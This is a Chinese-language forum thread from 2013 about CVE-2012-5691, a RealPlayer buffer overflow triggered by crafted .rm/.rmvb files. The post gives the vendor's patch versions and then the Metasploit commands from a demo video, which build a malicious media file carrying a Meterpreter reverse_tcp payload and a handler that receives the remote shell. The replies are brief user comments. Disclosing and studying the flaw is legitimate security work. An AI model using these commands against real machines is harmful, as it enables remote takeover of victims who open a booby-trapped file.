請選擇 進入手機版 | 繼續訪問電腦版

微剋多資訊

 找回密碼
 註冊

Sign in with google

Google帳號登入

搜索

該用戶從未簽到

升級   24.29%

發表於 2013-1-6 10:59 | 顯示全部樓層 |閱讀模式
本帖最後由 z24374203 於 2013-1-6 11:00 編輯

主題:利用 RealPlayer RealMedia 檔案的緩衝區溢位漏洞 (含影片示範)

發佈日期:2012/12/14

影響版本:Real Player v15.0.5.109 含以前的所有版本

漏洞編號:CVE-2012-5691

說明:
簡單描述就是可以利用 .rm,.rmvb 等影音檔案來傳遞有毒的後門網址!
由於該模組在 InternetShortcut不安全的使用 GetPrivateProfileString 函數來檢索網址 URL 的屬性,使得這個漏洞可以利用於真實的多媒體檔案(.rm,.rmvb)來傳遞具有木馬等後門的網址。
利用該原理就可以進行社交工程詐騙,尤其是一些使用多媒體整合包、影音整合套件的使用者,經常忘記需要更新多媒體套件內的相關套件的版本。

官方網站說明:
http://service.real.com/realplayer/security/12142012_player/en/
http://www.youtube.com/watch?v=fcvsADw3t3Y&feature=youtu.be

依照官方說明建議:
Windows XP, Vista, 7, 8 的使用者更新到 RealPlayer 16.0.0.282 的版本。
Mac OS X 10.3 ~ 10.8.2 的使用者更新到 Mac RealPlayer 12.0.1.1738 的版本。

影片內指令:
use exploit/windows/fileformat/real_player_url_property_bof
set FILENAME msf.rm
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit -j
sysinfo
getuid

轉自: https://www.facebook.com/netwargame?ref=stream&__req=t


樓主熱門主題

該用戶從未簽到

升級   0%

發表於 2013-1-6 13:26 | 顯示全部樓層
連影音檔都會有漏洞,真令人受不了
不過若用別種Player放.rm, .rmvb應該不會有這漏洞吧?
已很少用RealPlayer了

使用道具

該用戶從未簽到

升級   44%

發表於 2013-1-6 14:01 | 顯示全部樓層
不知道用potplayer有沒有這項漏洞,而且rmvb檔也很少會去看

使用道具

該用戶從未簽到

升級   98.2%

發表於 2013-1-8 15:38 | 顯示全部樓層
RealPlayer 已很久不用了
希望RealPlayer 公司,早些修正此安全漏洞

使用道具

您需要登入後才可以回帖 登入 | 註冊

本版積分規則

小黑屋|Archiver|微剋多資訊(MicroDuo)

GMT+8, 2024-3-29 14:46

Discuz! X

© 2009-2023 Microduo

快速回覆 返回頂部 返回列表